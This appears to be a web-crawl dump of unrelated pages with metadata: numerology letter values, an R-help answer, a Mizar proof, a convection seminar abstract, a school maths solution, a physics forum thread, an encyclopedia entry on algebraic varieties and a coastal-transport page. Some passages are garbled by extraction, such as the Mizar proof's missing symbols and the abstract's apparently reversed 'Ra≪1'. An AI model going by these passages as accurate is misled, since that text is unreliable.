numbers 1 and 2\n\nM, the thirteenth letter, carries the signification of the number 4 (because 13 becomes 1+3 = 4), and is marked by the influence of the 1 and 3\nN, the fourteenth letter, carries the signification of the number 5 (because 14 is reduced to 1+4 = 5), and is marked by the influence of the numbers 1 and 4\n\nO, the fifteenth letter, carries the signification of the number 6 (because 15 becomes 1+5 = 6), and is marked by the influence of the numbers 1 and 5\n\nP, the sixteenth letter, carries the signification of the number 7 (because 16 becomes 1+6 = 7), and is marked by the influence of the numbers 1 and 6\n\nQ, the seventeenth letter, carries the significations of the number 8 (because 17 is reduced to 1+7 = 8), and is marked by the influence of the numbers 1 and 7\n\nR, the eighteenth letter, carries the signification of the number 9 (because 18 is reduced to 1+8 = 9), and is marked by the numbers 1 and 8\n\nS, the nineteenth letter, carries the signification of the number 1 (because 19 becomes 1 + 9 = 10 = 1), and is marked by the numbers 1 and 9, and ends this second octave\n\nT, the twentieth letter, carries the signification of the number 2 (because 20 becomes 2 + 0 = 2), though amplified, an octave above\n\nU, the twenty-first letter, carries the signification of the number 3 (because 21 becomes 2+1=3), and is marked by the numbers 2 and 1\n\nV, the twenty-second letter, carries the signification of the number 4 (because 22 becomes 2 + 2 = 4), however, note that as the second master number of the scale, 22 possesses 
W, the twenty-third letter, carries the signification of the number 5 (because 23 becomes 2 + 3 = 5), and is marked by the numbers 2 and 3
X, the twenty-fourth letter, carries the signification of the number 6 (because 24 becomes 2 + 4 = 6), and is marked by the numbers 2 and 4
Y, the twenty-fifth letter, carries the signification of the number 7 (because 25 is reduced to 2 + 5 = 7), and is marked by the numbers 2 and 5
Z, the twenty-sixth letter, carries the signification of the number 8 (because 26 is reduced to 2 + 6 = 8), and is marked by the numbers 2 and 6.

This table summarizes the correspondence between the twenty-six letters of the alphabet and the first nine numbers. It is the basis of the Pythagorean method as well as of the principle of theosophical addition, which allows us to reduce any number down to one of the first nine numbers by adding the individual digits together.

| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
|---|---|---|---|---|---|---|---|---|
| A | B | C | D | E | F | G | H | I |
| J | K | L | M | N | O | P | Q | R |
| S | T | U | V | W | X | Y | Z |   |
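The reduction rule is just the repeated digit sum. A small C++ sketch (my own addition, not from the site; note it reduces the master numbers 11 and 22 as well, which the site treats specially):

```cpp
#include <cctype>
#include <iostream>

// Theosophical addition: repeatedly sum the decimal digits until a single
// digit remains, e.g. 1990 -> 19 -> 10 -> 1.
int reduce(int n) {
    while (n > 9) {
        int sum = 0;
        for (int m = n; m > 0; m /= 10) sum += m % 10;
        n = sum;
    }
    return n;
}

// Letter value per the table: A=1 ... I=9, J=10 -> 1, ..., Z=26 -> 8.
int letter_value(char c) {
    return reduce(std::toupper(static_cast<unsigned char>(c)) - 'A' + 1);
}

int main() {
    std::cout << reduce(1990) << '\n';      // 1
    std::cout << letter_value('K') << '\n'; // 11 reduces to 2
}
```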
[ null, "http://www.first-names-meanings.com/Images/sponsor.gif", null, "http://www.first-names-meanings.com/Images/lettres-et-nombres.jpg", null, "http://www.first-names-meanings.com/Images/chemin-de-vie.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/jour-de-naissance.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/symbolique-nombres.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/initiale-prenom.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/nombres-karmiques.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/lettres-et-nombres.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/sponsor.gif", null, "http://www.first-names-meanings.com/Images/horoscope-des-prenoms.jpg", null, "http://www.first-names-meanings.com/Images/horoscope-amour.jpg", null, "http://www.first-names-meanings.com/Images/horoscope-argent.jpg", null, "http://www.first-names-meanings.com/Images/horoscope-forme.jpg", null, "http://www.first-names-meanings.com/Images/horoscope-chiffre.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9293003,"math_prob":0.9882591,"size":6145,"snap":"2019-51-2020-05","text_gpt3_token_len":1631,"char_repetition_ratio":0.22439343,"word_repetition_ratio":0.21805792,"special_character_ratio":0.26948738,"punctuation_ratio":0.105672106,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.971308,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"im_url_duplicate_count":[null,4,null,4,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,4,null,null,null,4,null,2,null,1,null,2,null,1,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-23T18:23:12Z\",\"WARC-Record-ID\":\"<urn:uuid:971ebbf4-8620-4b6b-aad6-f2450ed208b3>\",\"Content-Length\":\"27768\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5fbc78ee-1110-47ab-a9df-c80f99d81d87>\",\"WARC-Concurrent-To\":\"<urn:uuid:d0005435-e82b-47d6-b778-d487709946c3>\",\"WARC-IP-Address\":\"185.18.82.122\",\"WARC-Target-URI\":\"http://www.first-names-meanings.com/letters-and-numbers.html\",\"WARC-Payload-Digest\":\"sha1:OHKKY5ZESUCOSNS6QZQCRCBWQTIP5RPG\",\"WARC-Block-Digest\":\"sha1:4RLKXDCTR35GDWSPIRO5SISZKX5BX5NY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250611127.53_warc_CC-MAIN-20200123160903-20200123185903-00225.warc.gz\"}"}
https://www.stat.math.ethz.ch/pipermail/r-help/2007-May/133119.html
[ "# [R] Aggregate to find majority level of a factor\n\nMike Lawrence Mike.Lawrence at DAL.CA\nThu May 31 22:43:25 CEST 2007\n\n```This should do the trick. Also labels ties with NA.\n\na=as.data.frame(cbind(c(1,1,1,2,2,2,3,3,3,4,4),c\n('big','big','small','big','small','small','small','small','small','big'\n,'small')))\na\\$V2=factor(a\\$V2)\n\nmaj=function(x){\ny=table(x)\nz=which.max(y)\nif(sum(y==max(y))==1){\nreturn(names(y)[z])\n}else{\nreturn(NA)\n}\n}\n\naggregate(a\\$V2,list(a\\$V1),maj)\n\nOn 31-May-07, at 4:25 PM, Thompson, Jonathan wrote:\n\n> I want to use the aggregate function to summarize data by a factor (my\n> field plots), but I want the summary to be the majority level of\n> another\n> factor.\n>\n>\n> For example, given the dataframe:\n>\n> Plot1 big\n> Plot1 big\n> Plot1 small\n> Plot2 big\n> Plot2 small\n> Plot2 small\n> Plot3 small\n> Plot3 small\n> Plot3 small\n>\n>\n> My desired result would be:\n> Plot1 big\n> Plot2 small\n> Plot3 small\n>\n>\n> I can't seem to find a scalar function that will give me the majority\n> level.\n>\n>\n> Jonathan Thompson\n>\n> ______________________________________________\n> R-help at stat.math.ethz.ch mailing list\n> https://stat.ethz.ch/mailman/listinfo/r-help\n> guide.html\n> and provide commented, minimal, self-contained, reproducible code.\n\n--\nMike Lawrence\nGraduate Student, Department of Psychology, Dalhousie University\n\nWebsite: http://myweb.dal.ca/mc973993\nPublic calendar: http://icalx.com/public/informavore/Public\n\n\"The road to wisdom? Well, it's plain and simple to express:\nErr and err and err again, but less and less and less.\"\n- Piet Hein\n\n```" ]
http://mizar.org/version/current/html/proofs/glib_010/65
[ "let G1, G2 be _Graph; :: thesis: ex f, g being Function st\n( = [f,g] & dom f c= the_Vertices_of G1 & rng f c= the_Vertices_of G2 & dom g c= the_Edges_of G1 & rng g c= the_Edges_of G2 & ( for e being object st e in dom g holds\n( () . e in dom f & () . e in dom f ) ) & ( for e, v, w being object st e in dom g & v in dom f & w in dom f holds\n( e Joins v,w,G1 iff g . e Joins f . v,f . w,G2 ) ) & ( for e, v, w being object st e in dom g & v in dom f & w in dom f & e Joins v,w,G1 holds\ng . e Joins f . v,f . w,G2 ) )\n\nset f = the empty Function;\ntake the empty Function ; :: thesis: ex g being Function st\n( = [ the empty Function,g] & dom the empty Function c= the_Vertices_of G1 & rng the empty Function c= the_Vertices_of G2 & dom g c= the_Edges_of G1 & rng g c= the_Edges_of G2 & ( for e being object st e in dom g holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom g & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff g . e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom g & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\ng . e Joins the empty Function . v, the empty Function . w,G2 ) )\n\ntake the empty Function ; :: thesis: ( = [ the empty Function, the empty Function] & dom the empty Function c= the_Vertices_of G1 & rng the empty Function c= the_Vertices_of G2 & dom the empty Function c= the_Edges_of G1 & rng the empty Function c= the_Edges_of G2 & ( for e being object st e in dom the empty Function holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff the empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\nthe empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) )\n\nthus [{},{}] = [ the empty Function, the empty Function] ; :: thesis: ( dom the empty Function c= the_Vertices_of G1 & rng the empty Function c= the_Vertices_of G2 & dom the empty Function c= the_Edges_of G1 & rng the empty Function c= the_Edges_of G2 & ( for e being object st e in dom the empty Function holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff the empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\nthe empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) )\n\nthus ( dom the empty Function c= the_Vertices_of G1 & rng the empty Function c= the_Vertices_of G2 & dom the empty Function c= the_Edges_of G1 & rng the empty Function c= the_Edges_of G2 ) by XBOOLE_1:2; :: thesis: ( ( for e being object st e in dom the empty Function holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff the empty Function . 
e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\nthe empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) )\n\nthus ( ( for e being object st e in dom the empty Function holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff the empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\nthe empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) ) ; :: thesis: verum" ]
https://www.sbai.uniroma1.it/en/node/6994
[ "## Seminario\n\nData evento:\nFriday, February 17, 2017 - 10:30\nVenerdi 17 febbraio 2017\nOre 10.30, aula 1B, Dipartimento SBAI\nSeminario di equazioni alle derivate parziali\n\nFelix Otto (MPI MIS Leipzig)\n\nRayleigh-Benard convection: Physically relevant a priori estimates\n\nWe are interested in Rayleigh-Benard convection, by which we understand the motion of a liquid in a container that is heated through the bottom and cooled through the top surface. In the Boussinesq approximation, this leads to the Navier-Stokes equations for the (divergence-free) velocity with no-slip boundary conditions coupled to an advection-diffusion equation for the temperature with inhomogeneous Dirichlet boundary conditions. The coupled system contains two nondimensional parameters: The Rayleigh Number $Ra$, that measures the strength of the imposed temperature gradient, and the Prandtl number $Pr$, that measures the strength of viscosity over inertia. We are interested in the regime of $Ra\\ll 1$, in which case the fluid motion is turbulent and the temperature features sharp boundary layers. One relevant way of measuring the turbulent transport is to monitor the Nusselt number $Nu$, which is the time and space-averaged upwards heat flux. Many (expensive) experiments and (large scale) numerical simulations display several scaling regimes for $Nu$ in terms of $Ra$ and $Pr$.\n\nIt is very surprising that rigorous PDE theory in form of a priori estimates can contribute to the understanding of these scaling regimes: In 1999, P. Constantin and C. Doering rigorously established the upper bound $Nu\\lesssim Ra^{1/3}$ (up to logarithms) in the regime of vanishing inertia, that is, for $Pr=\\infty$, in which case the Navier-Stokes equation is replaced by the quasi-static Stokes equation. This upper bound is consistent with the experimental and numerical data.\n\nWe present an extension to finite Prandlt Number (i.e. replacing the quasi-stationary Stokes by the time-dependent Navier-Stokes equation): We show that the upper bound $Nu\\lesssim Ra^{1/3}$ persists as long as $Pr\\ll Ra^{1/3}$, which goes beyond the small-data regime for Navier-Stokes.\n\nThe proof relies on a simple but curious estimate of the transport nonlinearity in terms of the dissipation rate. This estimate naturally leads to the $L^1$-norm with a singular weight depending on the distance to the no-slip boundary. Hence we need to develop a fairly involved maximal regularity theory for the instationary Stokes equation with no-slip boundary condition with respect to this norm. This is joint work with A. Choffrut and C. Nobili.\n\n© Università degli Studi di Roma \"La Sapienza\" - Piazzale Aldo Moro 5, 00185 Roma" ]
https://www.teachoo.com/12330/3414/Question-1-Choice---2/category/CBSE-Class-10-Sample-Paper-for-2021-Boards---Maths-Standard/
[ "## The decimal representation of The decimal representation of 14587/(2 1 × 5 4 ) will terminate after how many decimal places?", null, "1. Class 10\n2. Solutions of Sample Papers for Class 10 Boards\n3. CBSE Class 10 Sample Paper for 2021 Boards - Maths Standard\n\nTranscript\n\nQuestion 1 (Choice - 2) The decimal representation of the decimal representation of 14587/(2^1 × 5^4 ) will terminate after how many decimal places?14587/(2^1 × 5^4 ) = 14587/(2^1 × 5^4 ) × 2^3/2^3 = (14587 × 2^3)/((2^4 × 5^4)) = (14587 × 2^3)/(2 × 5)^4 = (14587 × 2^3)/〖10〗^4 So, the number will terminate after 4 decimal places\n\nCBSE Class 10 Sample Paper for 2021 Boards - Maths Standard\n\nClass 10\nSolutions of Sample Papers for Class 10 Boards", null, "" ]
[ null, "https://d1avenlh0i1xmr.cloudfront.net/86ea794d-9c87-49e9-984b-a5b2f234bd80/slide2.jpg", null, "https://delan5sxrj8jj.cloudfront.net/misc/Davneet+Singh.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7134212,"math_prob":0.9950322,"size":1601,"snap":"2021-31-2021-39","text_gpt3_token_len":518,"char_repetition_ratio":0.36819035,"word_repetition_ratio":0.0866426,"special_character_ratio":0.3703935,"punctuation_ratio":0.018518519,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99936813,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-24T17:01:49Z\",\"WARC-Record-ID\":\"<urn:uuid:46ee170b-163a-48b7-987c-95a9575f609c>\",\"Content-Length\":\"80261\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:acfee5f9-7824-47a3-9104-7e051ccc1d43>\",\"WARC-Concurrent-To\":\"<urn:uuid:d4f73694-91c9-43c7-92d2-8bf74cf8eb02>\",\"WARC-IP-Address\":\"35.169.250.74\",\"WARC-Target-URI\":\"https://www.teachoo.com/12330/3414/Question-1-Choice---2/category/CBSE-Class-10-Sample-Paper-for-2021-Boards---Maths-Standard/\",\"WARC-Payload-Digest\":\"sha1:BFRDBPY3Y37DGZOTP2O6WOFVWRJS5MJA\",\"WARC-Block-Digest\":\"sha1:L6KHTVMGRAKP6NUNKSKXFQHD554FVYDZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046150307.84_warc_CC-MAIN-20210724160723-20210724190723-00547.warc.gz\"}"}
https://pennstate.pure.elsevier.com/en/publications/application-of-mathematical-models-to-ethanol-fermentation-in-bio
[ "# Application of mathematical models to ethanol fermentation in biofilm reactor with carob extract\n\nMustafa Germec, Kuan Chen Cheng, Mustafa Karhan, Ali Demirci, Irfan Turhan\n\nResearch output: Contribution to journalArticlepeer-review\n\n10 Scopus citations\n\n## Abstract\n\nMathematical models not only ensure information about kinetic-metabolic nature of fermentations, but also facilitate their control and optimization. In the study, flexible ten models were evaluated and employed to describe the ethanol fermentation in a biofilm reactor with a carob extract medium (CEM). Findings indicated that W model well fitted the experimental data of cell growth (root mean square error (RMSE) = 0.289 g/L, mean absolute error (MAE) = 0.237 g/L, regression coefficient (R2) = 0.9944, bias factor (BF) = 1.021, and accuracy factor (AF) = 1.047), ethanol production (RMSE = 1.609 g/L, MAE = 1.277 g/L, R2 = 0.9774, BF = 1.178, and AF = 1.283), and substrate consumption (RMSE = 2.493 g/L, MAE = 1.546 g/L, R2 = 0.9931, BF = 1.001 and AF = 1.053). In the prediction of kinetic parameters, W model also gave better and well-directed results compared with the other mathematical models used in the study. When an independent set of experimental data was used in the validation of mathematical models, similar validation results were obtained and W model was also successful. Consequently, W model could be used for more progress of fermentation process in biofilm reactor with CEM, which can serve as a universal equation.\n\nOriginal language English (US) 237-252 16 Biomass Conversion and Biorefinery 10 2 https://doi.org/10.1007/s13399-019-00425-1 Published - Jun 1 2020\n\n## All Science Journal Classification (ASJC) codes\n\n• Renewable Energy, Sustainability and the Environment\n\n## Fingerprint\n\nDive into the research topics of 'Application of mathematical models to ethanol fermentation in biofilm reactor with carob extract'. Together they form a unique fingerprint." ]
https://www.thestudentroom.co.uk/showthread.php?t=5270304
[ "# How does momentum work in an explosion?\n\nAnnouncements\n#1\nSay we are in a situation of a particle exploding, and two particles merge from it, each going at different velocities.\n\nHow can momentum be modelled here and is the conservation of momentum applicable in such a situation?\n0\n4 years ago\n#2\nNot sure how you could model momentum here, if the particle is just exploding from still then there is no initial momentum to be conserved. But if it is colliding with another particle then momentum should be conserved from the collision. I'm doing As physics at the moment so perhaps somebody more qualified could give an accurate answer, really interesting question though!\n0\n4 years ago\n#3\n(Original post by RickHendricks)\nSay we are in a situation of a particle exploding, and two particles merge from it, each going at different velocities.\n\nHow can momentum be modelled here and is the conservation of momentum applicable in such a situation?\nYes, conservation of momentum does hold, and you apply it in the usual way, remembering that momentum is a vector. So a single \"particle\",initially at rest, splitting into two sub-particles of equal mass will leave the scene of the explosion in opposite directions at the same speed as the initial momentum is zero and therefore the sum of the momenta of the two particles after the explosion must sum to zero.\n0\n4 years ago\n#4\n(Original post by RickHendricks)\nSay we are in a situation of a particle exploding, and two particles merge from it, each going at different velocities.\n\nHow can momentum be modelled here and is the conservation of momentum applicable in such a situation?\n(Original post by Gregorius)\nYes, conservation of momentum does hold, and you apply it in the usual way, remembering that momentum is a vector. So a single \"particle\",initially at rest, splitting into two sub-particles of equal mass will leave the scene of the explosion in opposite directions at the same speed as the initial momentum is zero and therefore the sum of the momenta of the two particles after the explosion must sum to zero.\nIf the particles have different masses, they will have to leave at different speeds in order that the total momentum is 0.\n0\nX\n\nnew posts", null, "Back\nto top\nLatest\n\n### Oops, nobody has postedin the last few hours.\n\nWhy not re-start the conversation?\n\nsee more\n\n### Poll\n\nJoin the discussion\n\n#### How confident are you that you'll achieve the grades you need to get into your firm uni?\n\nI think I've exceeded the grades for my university offer (22)\n17.46%\nI think I've met the grades for my university offer (31)\n24.6%\nI think I've missed the grades for my university offer (68)\n53.97%\nSomething else (tell us in the thread) (5)\n3.97%" ]
[ null, "https://www.thestudentroom.co.uk/images/v2/icons/arrow_up.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9406478,"math_prob":0.8296301,"size":3396,"snap":"2022-27-2022-33","text_gpt3_token_len":754,"char_repetition_ratio":0.15212265,"word_repetition_ratio":0.72680414,"special_character_ratio":0.20612486,"punctuation_ratio":0.09633028,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9632185,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-14T03:27:29Z\",\"WARC-Record-ID\":\"<urn:uuid:c343a71c-70ee-47ac-86d2-87bba03a76b2>\",\"Content-Length\":\"236583\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:111d5981-4238-4fe5-b74b-065e27de2296>\",\"WARC-Concurrent-To\":\"<urn:uuid:d7c7e65b-9a62-4862-8e2c-81407b3a81be>\",\"WARC-IP-Address\":\"172.67.7.211\",\"WARC-Target-URI\":\"https://www.thestudentroom.co.uk/showthread.php?t=5270304\",\"WARC-Payload-Digest\":\"sha1:NLEEJ757CPNL7QO5ZM3TAGSGWLT555TV\",\"WARC-Block-Digest\":\"sha1:LGH5V6WN3XUB66ZRBBS2WHP5RDLRXTPK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571993.68_warc_CC-MAIN-20220814022847-20220814052847-00451.warc.gz\"}"}
https://encyclopediaofmath.org/wiki/Algebraic_systems,_variety_of
[ "# Algebraic systems, variety of\n\nA class of algebraic systems (cf. Algebraic systems, class of) of a fixed signature $\\Omega$, axiomatizable by identities, i.e. by formulas of the type\n\n$$( \\forall x _ {1} ) \\dots ( \\forall x _ {s} ) P ( f _ {1} \\dots f _ {n} ) ,$$\n\nwhere $P$ is some predicate symbol from $\\Omega$ or the equality sign, while $f _ {1} \\dots f _ {n}$ are terms of the signature $\\Omega$ in the object variables $x _ {1} \\dots x _ {s}$. A variety of algebraic systems is also known as an equational class, or a primitive class. A variety of signature $\\Omega$ can also be defined (Birkhoff's theorem) as a non-empty class of $\\Omega$- systems closed with respect to subsystems, homomorphic images and Cartesian products.\n\nThe intersection of all varieties of signature $\\Omega$ which contain a given (not necessarily abstract) class $\\mathfrak K$ of $\\Omega$- systems is called the equational closure of the class $\\mathfrak K$( or the variety generated by the class $\\mathfrak K$), and is denoted by $\\mathop{\\rm var} \\mathfrak K$. In particular, if the class $\\mathfrak K$ consists of a single $\\Omega$- system $\\mathbf A$, its equational closure is denoted by $\\mathop{\\rm var} \\mathbf A$. If the system $\\mathbf A$ is finite, all finitely-generated systems in the variety $\\mathop{\\rm var} \\mathbf A$ are also finite , .\n\nLet ${\\mathcal L}$ be a class of $\\Omega$- systems, let $S {\\mathcal L}$ be the class of subsystems of systems of ${\\mathcal L}$, let $H {\\mathcal L}$ be the class of homomorphic images of the systems from ${\\mathcal L}$, and let $\\Pi {\\mathcal L}$ be the class of isomorphic copies of Cartesian products of the systems of ${\\mathcal L}$. The following relation , is valid for an arbitrary non-empty class $\\mathfrak K$ of $\\Omega$- systems:\n\n$$\\mathop{\\rm var} \\mathfrak K = H S \\Pi \\mathfrak K .$$\n\nA variety is said to be trivial if the identity $x = y$ is true in each one of its systems. Any non-trivial variety $\\mathfrak M$ has free systems $F _ {m} ( \\mathfrak M )$ of any rank $m$ and $\\mathfrak M = \\mathop{\\rm var} F _ {\\aleph _ {0} } ( \\mathfrak M )$, .\n\nLet $S$ be a set of identities of the signature $\\Omega$ and let $KS$ be the class of all $\\Omega$- systems in which all the identities of $S$ are true. If the equality $\\mathfrak M = KS$ is satisfied for a variety $\\mathfrak M$ of signature $\\Omega$, $S$ is known as a basis for $\\mathfrak M$. A variety $\\mathfrak M$ is known as finitely baseable if it has a finite basis $S$. For any system $\\mathbf A$, a basis of the variety $\\mathop{\\rm var} \\mathbf A$ is also known as a basis of identities of the system $\\mathbf A$. If $\\mathfrak M$ is a finitely-baseable variety of algebras of a finite signature and if all algebras of $\\mathfrak M$ have distributive congruence lattices, then each finite algebra $\\mathbf A$ of $\\mathfrak M$ has a finite basis of identities . In particular, any finite lattice $\\langle \\mathbf A , \\lor, \\wedge \\rangle$ has a finite basis of identities. Any finite group has a finite basis of identities . On the other hand, there exists a six-element semi-group and a three-element groupoid without a finite basis of identities.\n\nThe varieties of $\\Omega$- systems contained in some fixed variety $\\mathfrak M$ of signature $\\Omega$ constitute under inclusion a complete lattice $L ( \\mathfrak M )$ with a zero and a unit, known as the lattice of subvarieties of the variety $\\mathfrak M$. 
The varieties of $\Omega$-systems contained in some fixed variety $\mathfrak{M}$ of signature $\Omega$ constitute under inclusion a complete lattice $L(\mathfrak{M})$ with a zero and a unit, known as the lattice of subvarieties of the variety $\mathfrak{M}$. The zero of this lattice is the variety with the basis $x = y$, $P(x_1, \dots, x_n)$ ($P \in \Omega$), while its unit is the variety $\mathfrak{M}$. If the variety $\mathfrak{M}$ is non-trivial, the lattice $L(\mathfrak{M})$ is anti-isomorphic to the lattice of all fully-characteristic congruences (cf. Fully-characteristic congruence) of the system $F_{\aleph_0}(\mathfrak{M})$ of countable rank which is free in $\mathfrak{M}$. The lattice $L_\Omega$ of all varieties of signature $\Omega$ is infinite, except for the case when the set $\Omega$ is finite and consists of predicate symbols only. The exact value of the cardinality of the infinite lattice $L_\Omega$ is known. The lattice of all lattice varieties is distributive and has the cardinality of the continuum. The lattice of all group varieties is modular, but it is not distributive. The lattice of varieties of commutative semi-groups is not modular.

Atoms of the lattice $L_\Omega$ of all varieties of signature $\Omega$ are known as minimal varieties of signature $\Omega$. Every variety with a non-unit system contains at least one minimal variety. If the $\Omega$-system $\mathbf{A}$ is finite and of finite type, then the variety $\operatorname{var}\mathbf{A}$ contains only a finite number of minimal subvarieties.

Let $\mathfrak{A}, \mathfrak{B}$ be subvarieties of a fixed variety $\mathfrak{M}$ of $\Omega$-systems. The Mal'tsev product $\mathfrak{A} \circ_{\mathfrak{M}} \mathfrak{B}$ denotes the class of those systems $\mathbf{A}$ of $\mathfrak{M}$ with a congruence $\theta$ such that $(\mathbf{A}/\theta) \in \mathfrak{B}$, and all cosets $a/\theta$ ($a \in \mathbf{A}$) which are systems in $\mathfrak{M}$ belong to $\mathfrak{A}$. If $\mathfrak{M}$ is the variety of all groups and if $\mathfrak{A}$ and $\mathfrak{B}$ are subvarieties of it, then the product $\mathfrak{A} \circ_{\mathfrak{M}} \mathfrak{B}$ is identical with the Neumann product. The product of varieties of semi-groups need not be a variety. A variety $\mathfrak{M}$ of $\Omega$-systems is called polarized if there exists a term $e(x)$ of the signature $\Omega$ such that in each system from $\mathfrak{M}$ the identities $e(x) = e(y)$, $F(e(x), \dots, e(x)) = e(x)$ ($F \in \Omega$) are true. If $\mathfrak{M}$ is a polarized variety of algebras and the congruences in all algebras in $\mathfrak{M}$ are commutable, then the Mal'tsev product $\mathfrak{A} \circ_{\mathfrak{M}} \mathfrak{B}$ of any subvarieties $\mathfrak{A}$ and $\mathfrak{B}$ in $\mathfrak{M}$ is a variety. One may speak, in particular, of the groupoid $G_I(\mathfrak{M})$ of subvarieties of an arbitrary variety $\mathfrak{M}$ of groups, rings, etc. If $\mathfrak{M}$ is the variety of all groups or all Lie algebras over a fixed field $P$ of characteristic zero, then $G_I(\mathfrak{M})$ is a free semi-group.

How to Cite This Entry:
Algebraic systems, variety of. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Algebraic_systems,_variety_of&oldid=45068
This article was adapted from an original article by D.M. Smirnov (originator), which appeared in Encyclopedia of Mathematics, ISBN 1402006098.
https://geo.libretexts.org/Bookshelves/Oceanography/Coastal_Dynamics_(Bosboom_and_Stive)/09%3A_Longshore_transport_and_coastline_changes/9.02%3A_Longshore_transport_formulations/8.2.2%3A_Cross-shore_distribution_of_longshore_transport
[ "# 8.2.2: Cross-shore distribution of longshore transport\n\n$$\\newcommand{\\vecs}{\\overset { \\rightharpoonup} {\\mathbf{#1}} }$$ $$\\newcommand{\\vecd}{\\overset{-\\!-\\!\\rightharpoonup}{\\vphantom{a}\\smash {#1}}}$$$$\\newcommand{\\id}{\\mathrm{id}}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$ $$\\newcommand{\\kernel}{\\mathrm{null}\\,}$$ $$\\newcommand{\\range}{\\mathrm{range}\\,}$$ $$\\newcommand{\\RealPart}{\\mathrm{Re}}$$ $$\\newcommand{\\ImaginaryPart}{\\mathrm{Im}}$$ $$\\newcommand{\\Argument}{\\mathrm{Arg}}$$ $$\\newcommand{\\norm}{\\| #1 \\|}$$ $$\\newcommand{\\inner}{\\langle #1, #2 \\rangle}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$ $$\\newcommand{\\id}{\\mathrm{id}}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$ $$\\newcommand{\\kernel}{\\mathrm{null}\\,}$$ $$\\newcommand{\\range}{\\mathrm{range}\\,}$$ $$\\newcommand{\\RealPart}{\\mathrm{Re}}$$ $$\\newcommand{\\ImaginaryPart}{\\mathrm{Im}}$$ $$\\newcommand{\\Argument}{\\mathrm{Arg}}$$ $$\\newcommand{\\norm}{\\| #1 \\|}$$ $$\\newcommand{\\inner}{\\langle #1, #2 \\rangle}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$$$\\newcommand{\\AA}{\\unicode[.8,0]{x212B}}$$", null, "Figure 8.1: Example of model results (longshore current velocity $$V(x)$$, longshore transport rates $$s_y (x)$$ and transport integrated over the cross-shore $$S_y$$) computed with Unibest-CL+ (https://www.deltares.nl/en/software/unibest-cl) for a 2012 measured profile near Egmond (transect 